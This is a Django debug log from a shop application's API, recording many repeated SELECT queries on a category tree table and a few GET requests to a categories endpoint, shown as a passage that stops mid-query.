2019-12-16 12:47:32,969 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:32,973 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:32,976 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:32,979 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:32,981 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:32,984 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:32,986 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:32,991 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:32,993 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:32,996 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:32,998 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:33,001 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:33,003 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:33,007 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:33,009 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:33,012 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:33,016 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:33,018 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:39,690 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:39,698 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:39,702 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:39,704 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:47:39,707 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:47:39,710 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:47:39,712 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:47:39,714 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:47:39,716 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:47:39,720 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:47:39,722 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:47:39,724 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:47:39,727 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:47:39,729 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:47:39,732 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:47:39,735 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:47:39,738 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:47:39,742 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:47:39,744 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:47:39,748 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:47:39,750 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:47:39,753 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:47:39,755 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:47:39,757 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:47:39,759 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:39,763 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:39,765 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:39,767 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:39,769 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:39,773 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:39,776 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:39,779 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:39,781 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:39,783 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:39,787 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:39,791 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:39,793 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:39,796 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:39,798 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:39,800 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:39,802 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:39,806 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:39,808 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:39,810 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:39,813 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:39,816 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:40,470 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:47:40,477 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:47:40,482 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:47:40,485 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 